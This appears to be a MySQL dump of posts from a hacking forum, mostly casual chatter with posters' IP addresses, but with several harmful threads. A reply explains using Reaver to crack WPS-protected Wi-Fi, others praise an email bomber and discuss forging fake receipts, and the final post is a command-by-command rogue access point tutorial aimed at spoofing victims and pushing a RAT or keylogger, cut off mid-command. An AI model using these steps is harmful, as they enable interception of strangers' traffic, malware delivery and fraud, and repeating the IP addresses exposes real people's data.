INTO mybb_posts VALUES('5863', '1016', '5809', '7', 'RE: Flying Steps', '0', '62', 'R?????zo?', '1350819552', 'nice, looks awesome.\nwish i could do that haha', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '14a7d0263bb3538a2f397eb1524f4cd9', '0', '0'); INSERT INTO mybb_posts VALUES('5864', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '62', 'R?????zo?', '1350819650', 'thanks for the feedback guys. :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '224cf6e7c2ebf5f3585f213ed0cdbbd1', '0', '0'); INSERT INTO mybb_posts VALUES('5865', '1011', '5800', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350819709', '[quote=\'VirtualLegend\' pid=\'5800\' dateline=\'1350770727\']\nHave you ever thought to make money designing graphics ?\n\nCuz your pretty damn good at it\n[/quote]\n\nI\'ve worked as a webdesginer, is that good enough? :P', '94.132.244.168', '1585771688', '1', '0', '62', '1350928731', '1', 'e90782f815d614f80e2fcbf4643b6b8f', '0', '1350928731'); INSERT INTO mybb_posts VALUES('5866', '1016', '5809', '7', 'RE: Flying Steps', '0', '205', 'mothered', '1350821032', 'Cheers guys.\r\n\r\nFlying Steps have won many world championships, so they\'re definitely pros.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9784418f2606df4b6ba2c24d4424ecba', '0', '0'); INSERT INTO mybb_posts VALUES('5867', '1019', '5836', '3', 'RE: Do you like your new?', '0', '205', 'mothered', '1350821130', 'I must say that I like them.\r\n\r\nThey blend In very well Indeed.\r\nGood work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ca11242814687137caef4382711185de', '0', '0'); INSERT INTO mybb_posts VALUES('5868', '1001', '5841', '7', 'RE: Shady URL', '0', '205', 'mothered', '1350821267', '[quote=\'PiXEL^OG\' pid=\'5841\' dateline=\'1350799870\']\r\n\r\n\r\nlol i did not see that , Anyways good post\r\n[/quote]\r\n\r\nNo problem at all. All good :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd56611e9da29853385659a5444d9c6a5', '0', '0'); INSERT INTO mybb_posts VALUES('5869', '1026', '0', '3', '1000 THREADS !!!!', '0', '228', 'VirtualLegend', '1350821588', '[size=medium][align=center]L33tHacking Members we did it one thousand threads. All Thanks to the L33tHacking Members that made to the 1000 threads. Let\'s do our best and go for the 2000 threads. If that happens than I\'m gonna do a backflip (I can\'t do that) :P \r\n\r\n[img]http://i.imgur.com/hlAkt.png[/img]\r\n\r\nPeace OUT People[/align][/size]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dbe738e17a6e9e4cd2b642e75b0d3915', '0', '0'); INSERT INTO mybb_posts VALUES('5870', '1019', '5836', '3', 'RE: Do you like your new?', '0', '228', 'VirtualLegend', '1350821803', 'This is gonna make me more active :P \n\nThanks Joker', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2829a3492118e7462a949c366ba6f8f4', '0', '0'); INSERT INTO mybb_posts VALUES('5871', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '205', 'mothered', '1350821981', 'Your best option Is to use BackTrack. It has most of the required tools pre-Installed.\r\n\r\nIf the AP Is vulnerable to WPS, you can use \"Reaver\" In BackTrack to crack the WPA PIN, hence reveal the password. The handshake methodology does fail at the best of times, so only use this when absolutely needed.\r\n\r\nHave a look at this: http://www.securitytube.net/video/2661', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7b1ac7cbd7e8cec6a0b7294774fd7744', '0', '0'); INSERT INTO mybb_posts VALUES('5872', '1023', '5844', '4', 'RE: New member here!!', '0', '228', 'VirtualLegend', '1350822054', 'Welcome sir\n\nI Hope that you stay active on LH And that you post HQ threads \n\nHave a nice stay :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5d35fc706bbc3aeff84208744116f5a1', '0', '0'); INSERT INTO mybb_posts VALUES('5873', '1018', '5826', '47', 'RE: giving away premium account', '0', '228', 'VirtualLegend', '1350822679', 'I Don\'t need a Account, But It\'s really nice of you to give one of your accounts away !\n\nKeep it Up Like this', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cdeb9aee151da07ea3308fbdd8631d90', '0', '0'); INSERT INTO mybb_posts VALUES('5874', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '228', 'VirtualLegend', '1350822883', 'It\'s really easy to hack a WPA but a WPA2 is a little bit difficult.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a5b084a116ba7d44905d7ca355d0c10b', '0', '0'); INSERT INTO mybb_posts VALUES('5875', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '228', 'VirtualLegend', '1350823480', 'Seems good, Gonna try it out\n\nThanks for the share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '38771e67d91a18c17d15ad070d50f376', '0', '0'); INSERT INTO mybb_posts VALUES('5876', '1019', '5836', '3', 'RE: Do you like your new?', '0', '222', 'Exposé', '1350825612', 'Nice edition to the site joker :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '98cd41bfd61cb65bc0a1926d349260dd', '0', '0'); INSERT INTO mybb_posts VALUES('5877', '1011', '5739', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '2', 'Apathy', '1350829262', '[quote=\'R?????zo?\' pid=\'5739\' dateline=\'1350748227\']\r\nwhy you say that?\r\nif you would only see without the photoshop you wouldn\'t know if it was scanned or not.\r\n[/quote]\r\n\r\nIf the paper is crinkled the letters should fallow suit. As I not be perfect when the paper is supposed to be crinkled up. You get what I mean?', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '1852e9784552d349aa6ef4ead9cfd408', '0', '0'); INSERT INTO mybb_posts VALUES('5878', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '2', 'Apathy', '1350829695', 'I use a laptop for the most part because mine is sexy.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '5878c7e33400dec7b3ffbf6a2eecd92f', '0', '0'); INSERT INTO mybb_posts VALUES('5879', '1011', '5877', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350831901', '[quote=\'Apathy\' pid=\'5877\' dateline=\'1350829262\']\r\n[quote=\'R?????zo?\' pid=\'5739\' dateline=\'1350748227\']\r\nwhy you say that?\r\nif you would only see without the photoshop you wouldn\'t know if it was scanned or not.\r\n[/quote]\r\n\r\nIf the paper is crinkled the letters should fallow suit. As I not be perfect when the paper is supposed to be crinkled up. You get what I mean?\r\n[/quote]\r\n\r\nif you own a scanner you can just print it, and then crinckle up yourself and scan it , that\'s what I\'ve done before.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0b546b9beb656a26daaf55af16d18ecc', '0', '0'); INSERT INTO mybb_posts VALUES('5880', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '62', 'R?????zo?', '1350831952', 'Gratz everyone :)\nwe are growing :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6bc73a119b55f4ac9e1337129cfd9e87', '0', '0'); INSERT INTO mybb_posts VALUES('5881', '1019', '5836', '3', 'RE: Do you like your new?', '0', '62', 'R?????zo?', '1350832030', 'Looks like you forgot me :(', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '00da087eb522cea11a7b77e168f3dad1', '0', '0'); INSERT INTO mybb_posts VALUES('5882', '1023', '5844', '4', 'RE: New member here!!', '0', '222', 'Exposé', '1350834549', 'Welcome bro again to LH lol and hopefully you can stay active :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'd4947253f482621e5ad039ddfbe4cbde', '0', '0'); INSERT INTO mybb_posts VALUES('5883', '1019', '5836', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350834711', 'You can give me that position to grant users awards. I don\'t mind. :) \n\nOT: Nice update :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b62e99ff20dcab548d3e3f0accdb707d', '0', '0'); INSERT INTO mybb_posts VALUES('5884', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350834757', '@t3h jok3r can you check out the thread? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '56c9543a8d73c767f59dd4f2b6f5ff54', '0', '0'); INSERT INTO mybb_posts VALUES('5885', '2', '4', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1350834819', 'Good luck on the group.\nHopefully it\'ll be a good addition to LH', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '006d54198cc043c614a3a6b24769d198', '0', '0'); INSERT INTO mybb_posts VALUES('5886', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '222', 'Exposé', '1350834859', 'Maybe this will work on mah iphone :D. Thanks ill try it out', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'dace62cad7b2c1151bd46fef47a3b96c', '0', '0'); INSERT INTO mybb_posts VALUES('5887', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '82', 'iTzIpod', '1350834860', 'Made a new Minecraft Server! :)\nThanks again.\n\nProbably the most HQ post you made so far in my opinion.\nOthers are just LQ or so.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b8465361b2dfe65f8026c023573f2112', '0', '0'); INSERT INTO mybb_posts VALUES('5888', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '82', 'iTzIpod', '1350834979', 'Do you want to close the thread now or something?\nAnd then make a new thread afterwards?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1295b77504afbb8705611a57d114c750', '0', '0'); INSERT INTO mybb_posts VALUES('5889', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350835014', 'Yeah I agree.\nBut I don\'t know what to do or what to put :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14377222bbdfabac17047c3bd806f3bd', '0', '0'); INSERT INTO mybb_posts VALUES('5890', '1015', '5791', '7', 'RE: Grounded', '0', '82', 'iTzIpod', '1350835190', 'Never get grounded.\nJust yelled and spanked at.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7741f68da3adeaf29b651c97464b1619', '0', '0'); INSERT INTO mybb_posts VALUES('5891', '1015', '5791', '7', 'RE: Grounded', '0', '222', 'Exposé', '1350835289', 'Who the fuck get\'s spanked....(facepalm)\n\nAnd I can get 2000 paintball\'s for 30$ umad?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '8587e51431f061777549da4be3fa1c88', '0', '0'); INSERT INTO mybb_posts VALUES('5892', '1018', '5826', '47', 'RE: giving away premium account', '0', '82', 'iTzIpod', '1350835352', 'I should get this account because I was one of the first 100 members on this site. #82\nAnd also, I have the most posts on LH and contributed A LOT to this forum.\nMost of my posts tend to be HQ and Grammar and Spelling Free.\nMOST.\nAnd also, I have referred about 10 or 15 members on this site. \nI am planning on referring more.\n\nI have probably the best Usergroup on LH.\nOr had...\nUnique!! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f582abf23c8021b6ee35fd2ce4f97051', '0', '0'); INSERT INTO mybb_posts VALUES('5893', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '82', 'iTzIpod', '1350835385', 'We are growing everyday :)\nHopefully we become more successful than HF :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8717111b251a7b7329627f3ff781dc3', '0', '0'); INSERT INTO mybb_posts VALUES('5894', '1023', '5844', '4', 'RE: New member here!!', '0', '82', 'iTzIpod', '1350835638', 'Welcome to LH bro :p Enjoy your stay :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2e020bb58e8fef19f7e6836c4b6698b', '0', '0'); INSERT INTO mybb_posts VALUES('5895', '1015', '5791', '7', 'RE: Grounded', '0', '82', 'iTzIpod', '1350835687', 'I get spanked. Lol\nI told you my age. -.-\nAsian Parents....', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4a635cf2a76da79d6977168d1b20d575', '0', '0'); INSERT INTO mybb_posts VALUES('5896', '1023', '5844', '4', 'RE: New member here!!', '0', '61', 'NXK', '1350836699', 'Welcome here, I hope you enjoy it.\n\nTry to stay HQ and active :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0b1afbd736c962aac04d917266eddfae', '0', '0'); INSERT INTO mybb_posts VALUES('5897', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '3', '??????????¢™', '1350837091', 'We are growing very fast, Lets keep it up', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '8f1964896f0a56ab126280474d5a71ea', '0', '0'); INSERT INTO mybb_posts VALUES('5898', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '61', 'NXK', '1350837129', 'Rush rush rush. Probably my favorite thing to do.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4c00b8357797a043324989e65768003c', '0', '0'); INSERT INTO mybb_posts VALUES('5899', '1015', '5791', '7', 'RE: Grounded', '0', '3', '??????????¢™', '1350837153', 'I dont get grounded anymore.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '1d96ed490dfc551007ed41561be22e89', '0', '0'); INSERT INTO mybb_posts VALUES('5900', '1023', '5844', '4', 'RE: New member here!!', '0', '3', '??????????¢™', '1350837296', 'Well welcome to LH, We hope you enjoy your stay here.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '7d4d44507fc9847324f0cc4ffc05bafb', '0', '0'); INSERT INTO mybb_posts VALUES('5901', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '3', '??????????¢™', '1350837364', 'You could add another character in it on the other side and maybe a pet or something like a pokemon lol.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'fc507320bbcf54063b2f7dc91169e512', '0', '0'); INSERT INTO mybb_posts VALUES('5902', '1023', '5844', '4', 'RE: New member here!!', '0', '258', 'PiXEL^OG', '1350841549', 'Thanks for the warm welcome guys :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '62665c4e62784ee380ce9ac380774f84', '0', '0'); INSERT INTO mybb_posts VALUES('5903', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '258', 'PiXEL^OG', '1350841949', 'This community is growing fast!! :D\n\nI really hope we become a big and HQ forum with mostly tutorial threads because im sick of other forums where people just post bullshit all the time like HF\n\nMay LH achieve greatness :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8441478ff489d76299f82e574383a828', '0', '0'); INSERT INTO mybb_posts VALUES('5904', '197', '696', '56', 'RE: /me Thread', '0', '3', '??????????¢™', '1350843353', '/me was the first admin that was on this forum and is the best!', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '937ba38726579c936d339f5e7d62897f', '0', '0'); INSERT INTO mybb_posts VALUES('5905', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350843495', 'ROFL a Pokemon.. Hm.\nSeems legit?\n:3\nWould be quite funny. \nMight just make it Cloud Strife but transparent in the background.\nI can\'t explain it. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e962559f894ae5328059e8e66875464d', '0', '0'); INSERT INTO mybb_posts VALUES('5906', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350843537', '/me wishes to be a Mod/SMod/Admin :p\n\nOr, someone in power.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '007bf424ea31064264d186582cb8ea1e', '0', '0'); INSERT INTO mybb_posts VALUES('5907', '1015', '5791', '7', 'RE: Grounded', '0', '82', 'iTzIpod', '1350843604', 'You\'re lucky then iPownaholicTM\nSorry if I spell your name wrong.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '11bda2d65bbd6eff6b84d7c4e0a465c8', '0', '0'); INSERT INTO mybb_posts VALUES('5908', '197', '696', '56', 'RE: /me Thread', '0', '3', '??????????¢™', '1350843796', '/me wants t3h jok3r to get on skype ASAP.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '0b5d9c69d0af376c9a070b31aef46513', '0', '0'); INSERT INTO mybb_posts VALUES('5909', '1027', '0', '58', '[ Updated ] Marketers Group Request', '17', '228', 'VirtualLegend', '1350843854', '[align=justify][size=medium][b][u][color=#32CD32]Name Of the Group:[/color][/u][/b] The Marketers\r\n\r\n[u][b][color=#32CD32]Group Description:[/color][/b][/u] We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too.\r\n\r\n[u][b][color=#32CD32]Group Userbar:[/color][/b][/u] [img]http://i.imgur.com/ifvO7.gif[/img]\r\n\r\n[u][b][color=#32CD32]Forum Name:[/color][/b][/u] The Marketers Palace\r\n\r\n[u][b][color=#32CD32]Forum Icon(34x34):[/color][/b][/u] [img]http://i.imgur.com/uP3eg.png[/img]\r\n\r\n[u][b][color=#32CD32]Why LH should make this group official:[/color][/b][/u] Because we don\'t have a group like this on LH. We will ensure that the Monetizing section is full of Money Making methods and tips. [/size][/align]\r\n\r\n[color=#FF0000][size=medium]I Hope that you will approve this group and that many People will join ![/size][/color]', '83.83.167.183', '1397991351', '1', '0', '228', '1350902474', '1', '41563d54fb8da44dc5fd45424a273826', '0', '1350902474'); INSERT INTO mybb_posts VALUES('5910', '197', '696', '56', 'RE: /me Thread', '0', '228', 'VirtualLegend', '1350844046', '/me is testing this out', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ac2aab70b68880d6348cfbcdc68d65db', '0', '0'); INSERT INTO mybb_posts VALUES('5911', '1027', '5909', '58', 'RE: Marketers Group Request', '0', '61', 'NXK', '1350844595', 'I like the idea, But you\'re going to need to make a new userbar.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9cd282fc9151923db2eee23affd732b2', '0', '0'); INSERT INTO mybb_posts VALUES('5912', '1019', '5883', '3', 'RE: Do you like your new?', '0', '1', 't3h jok3r', '1350845021', '[quote=\'iTzIpod\' pid=\'5883\' dateline=\'1350834711\']\r\nYou can give me that position to grant users awards. I don\'t mind. :) \r\n\r\nOT: Nice update :D\r\n[/quote]\r\n\r\nHow about have you banned? You seem to volunteer for everything now right so how about volunteer to get banned?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f8bd372589b70fa06a2f23a408dde17e', '0', '0'); INSERT INTO mybb_posts VALUES('5913', '1027', '5909', '58', 'RE: Marketers Group Request', '0', '82', 'iTzIpod', '1350845057', 'Nice idea.\nGood luck.\nHope it gets approved :)\nWould love to join', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '27e0b427468f94791d0f978e1f83da26', '0', '0'); INSERT INTO mybb_posts VALUES('5914', '1027', '5909', '58', 'RE: Marketers Group Request', '0', '1', 't3h jok3r', '1350845150', 'http://l33thacking.net/thread-212.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2a961f4b73198cae5972e20535e26d85', '0', '0'); INSERT INTO mybb_posts VALUES('5915', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '1', 't3h jok3r', '1350845249', 'Yay! Thanks for the contributions everyone. I highly appreciate it, LH is growing fast and hopefully we will be the online best hacker community online.\n\nI have a couple of plans on advertising and promoting L33T Hacking, if you would like to help then feel free to PM me.', '72.231.24.165', '1223104677', '1', '0', '1', '1350845282', '1', 'f70916d1c9db5f09748c7f258470f936', '0', '1350845282'); INSERT INTO mybb_posts VALUES('5916', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350845281', '/me is posting in the /me thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b6396aa4635d2cfc6d8600ebdf3fecc', '0', '0'); INSERT INTO mybb_posts VALUES('5917', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350845351', 'Some Forum Userbars on the OP are fucked up.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8d26d62371b4c56cd6b954536ec1e466', '0', '0'); INSERT INTO mybb_posts VALUES('5918', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '82', 'iTzIpod', '1350845397', 'PM me what you need. I\'ll try to do it? :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cc4fb8616d5d77f704ea9c47d704a31d', '0', '0'); INSERT INTO mybb_posts VALUES('5919', '1019', '5836', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350845633', 'I don\'t see whynot? :)\n\n\nJoking. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3ef91c46a34beaa5039460ef0dd499a', '0', '0'); INSERT INTO mybb_posts VALUES('5920', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350845813', '[align=justify][size=medium][b][u][color=#32CD32]Name Of the Group:[/color][/u][/b] The Marketers\n\n[u][b][color=#32CD32]Group Description:[/color][/b][/u] We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too.\n\n[u][b][color=#32CD32]Group Userbar:[/color][/b][/u] [img]http://i.imgur.com/wlfDq.png[/img]\n\n[u][b][color=#32CD32]Forum Name:[/color][/b][/u] The Marketers Palace\n\n[u][b][color=#32CD32]Forum Icon(34x34):[/color][/b][/u] [img]http://i.imgur.com/uP3eg.png[/img]\n\n[u][b][color=#32CD32]Why LH should make this group official:[/color][/b][/u] Because we don\'t have a group like this on LH. We will ensure that the Monetizing section is full of Money Making methods and tips. [/size][/align]\n\n[color=#FF0000][size=medium]I Hope that you will approve this group and that many People will join ![/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '856d3a02085f16d82e966dd4c4bc6276', '0', '0'); INSERT INTO mybb_posts VALUES('5921', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350846077', 'Good luck Virtual with the group.\nSeems nice.\nWishing to join it and become successful and a great addition to LH.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee5919147475e571e9ec4481082e13c7', '0', '0'); INSERT INTO mybb_posts VALUES('5922', '1019', '5919', '3', 'RE: Do you like your new?', '0', '1', 't3h jok3r', '1350846660', '[quote=\'iTzIpod\' pid=\'5919\' dateline=\'1350845633\']\r\nI don\'t see whynot? :)\r\n\r\n\r\nJoking. -.-\r\n[/quote]\r\n\r\nLol as I said only staff and admins give out awards.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '793199a4a92e362a2811d4f3b1cc433a', '0', '0'); INSERT INTO mybb_posts VALUES('5923', '1019', '5836', '3', 'RE: Do you like your new?', '0', '3', '??????????¢™', '1350847069', 'Yay the award system finally.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '23f8f175d24f9b0f4c4a6b9649281a94', '0', '0'); INSERT INTO mybb_posts VALUES('5924', '197', '696', '56', 'RE: /me Thread', '0', '3', '??????????¢™', '1350847132', '/me says \"t3h jok3r get on skype ASAP please.\"', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'fd420406e253ed59d373765744b1634e', '0', '0'); INSERT INTO mybb_posts VALUES('5925', '212', '5921', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350847250', '[quote=\'iTzIpod\' pid=\'5921\' dateline=\'1350846077\']\r\nGood luck Virtual with the group.\r\nSeems nice.\r\nWishing to join it and become successful and a great addition to LH.\r\n[/quote]\r\n\r\nIf the group is official i will add you as a member.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e1a843719930d83f8f772feafd6438fb', '0', '0'); INSERT INTO mybb_posts VALUES('5926', '998', '5649', '12', 'RE: Port Scanning Tutorial', '0', '4', 'Triple H', '1350847297', 'Looks amazing. Thanks for the script and explanation.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '75c5f5f2c592aba6d4b9538fc49be2f7', '0', '0'); INSERT INTO mybb_posts VALUES('5927', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '4', 'Triple H', '1350847425', 'Love the layout. Thanks a bunch i learned a lot today', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '55906f41e06d6633a9ad437b79a30acb', '0', '0'); INSERT INTO mybb_posts VALUES('5928', '1028', '0', '12', '[Tutorial] How to create a Fake Prank Wifi Access Point', '0', '4', 'Triple H', '1350847562', '[align=center][b]How to create a Fake Prank Wifi Access Point [/b][/align]\r\n\r\nHere\'s the deal: how would you like to create a fake access point named, say Wifi Hotspot, and have people connect to YOU. From there, you can mess around with them, DNS spoof them to websites, or even your own web server convincing them to download your RAT/keylogger. Or how about monitoring all their websites and network traffic? I won\'t show you all of this, but I\'ll show you some.\r\n\r\n\r\nNow the tutorial!! This is for educational purposes only. Please stay ethical with this and always get permission before you do something. I know you will ignore my plea for righteousness, but really, stay ethical. It will pay off in the long term! Now, let me give a brief overview of what we are going to accomplish here. We will create a fake access point with whatever name you like, and provide any person that connects to it with internet access, so they will think they are on a legitimate access point! Then from there, we can do many things do the client.\r\n\r\nTABLE OF CONTENTS:\r\n\r\nWHAT WE NEED\r\n\r\nSTEP ONE: GETTING THE DHCP3 SERVER\r\n\r\nSTEP TWO: CONFIGURING THE DHCP3 SERVER\r\n\r\nSTEP THREE: SETTING UP THE FAKE ACCESS POINT AND RUNNING THE DHCP3 SERVER\r\n\r\nSTEP FOUR: SETTING UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS\r\n\r\nSTEP FIVE: SCREWING WITH PEOPLE\r\n\r\nWHAT WE NEED:\r\n1. Two wireless interfaces. (An external USB wifi adapter, plus your internal wifi laptop adapter) A good external wifi adapter is the ALFA AWUS036H. It\'s the one I use. You can get one for about 25 dollars on Amazon.\r\n2. Backtrack 5 R2 (R1 should work, but this was tested on R2)\r\n3. A brain please.\r\n\r\n\r\nSTEP ONE: GETTING THE DHCP3 SERVER\r\n\r\nWe need to update Backtrack and then install the dhcp3 server.\r\n\r\nCode:\r\n[code]apt-get update && apt-get upgrade && apt-get dist-upgrade\r\n[/code]\r\n\r\nCode:\r\n\r\n[code]apt-get install dhcp3-server\r\n[/code]\r\n\r\n\r\nCool we got all the stuff \r\nwe need! We are ready to begin our attack. Please make sure that your laptop interface (should be wlan0) is connected to your own router. Make sure that your external interface is plugged in and ready to go (this one should be wlan1).\r\n\r\nSTEP TWO: CONFIGURING THE DHCP3 SERVER\r\n\r\nWe must begin the process of configuring our dhcp3 server so that our clients will receive an IP address when they connect. I expect your laptop interface to be connected to your router right now, and the external interface plugged in but not connected to any router, so we will run a check to determine our DNS address.\r\n\r\nCode:\r\n[code]cat /etc/resolv.conf[/code]\r\n\r\nSee that IP address printed after \"nameserver\"? That\'s the DNS address. Please take note of it. In the soon following code, we will replace $dns with the DNS address you saw in the previous command.\r\n\r\nCode:\r\n[code]gedit /etc/dhcp3/dhcpd.conf[/code]\r\n\r\nIf you are using Backtrack 5 KDE version, type this instead:\r\n\r\nCode:\r\n[code]kwrite /etc/dhcp3/dhcpd.conf[/code]\r\n\r\nIf kwrite doesn\'t work, replace it with kate.\r\n\r\nNow we have a text editor open with some text in it. Delete everything you see, and replace it with this:\r\n\r\nCode:\r\n[code]ddns-update-style ad-hoc;\r\ndefault-lease-time 600;\r\nmax-lease-time 7200;\r\nauthoritative;\r\nsubnet 192.168.2.128 netmask 255.255.255.128 {\r\noption subnet-mask 255.255.255.128;\r\noption broadcast-address 192.168.2.255;\r\noption routers 192.168.2.129;\r\noption domain-name-servers $dns;\r\nrange 192.168.2.130 192.168.2.140;\r\n}[/code]\r\n\r\nRemember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this:\r\n\r\nCode:\r\n[code]option domain-name-servers 192.168.0.1;[/code]\r\n\r\nSTEP THREE: SET UP THE FAKE ACCESS POINT AND RUN THE DHCP3 SERVER\r\n\r\nLet\'s configure our wireless interfaces shall we? We need to put our external interface into monitor mode. If you don\'t know the names of your interfaces, type \"ifconfig\" without quotes, and it will show you. In my situation, the external interface is wlan1, so just replace that with YOUR external interface.\r\n\r\nCode:\r\n[code]airmon-ng start wlan1[/code]\r\n\r\nCode:\r\n[code]airbase-ng -e \"NAME OF ACCESS POINT HERE\" -c 9 mon0[/code]\r\n\r\nNow open a new terminal and type the following code which will set up our fake access point along with the dhcp3 server. Be sure to enter each command separately.\r\n\r\nCode:\r\n[code]ifconfig at0 up \r\nifconfig at0 192.168.2.129 netmask 255.255.255.128 \r\nroute add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 \r\nmkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd \r\necho > \'/var/lib/dhcp3/dhcpd.leases\' \r\ndhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0\r\n[/code]\r\nYou should now have two terminals running. One with airbase-ng maintaining your fake access point, and another with the dhcp3 server open. We now need to set up our iptables to let our clients gain internet access.\r\n\r\nSTEP FOUR: SET UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS\r\n\r\nYour laptop interface should be connected to your router!! I am assuming your laptop interface is wlan0, but if not, type ifconfig to see which one it is. If you don\'t know what it is, you should close out of this tutorial. There are some variables in this next code you will need to replace yourself. I will tell you how and which.\r\n\r\nWe need to find your gateway address. Type the following into a new terminal:\r\n\r\nCode:\r\n[code]route | grep \"default\"[/code]\r\n\r\nSee that IP address next to \"default\"? That is your gateway IP address, and you should take note of it. It should, in most cases, be the same as your DNS address. Remember your laptop interface? It should be wlan0, if not, you should know what it is. In the following code, replace $interface with your laptop interface, and $gateway with your gateway IP address. Be sure to enter each command separately (yes a lot of copy and pasting).\r\n\r\nCode:\r\n[code]echo 1 > 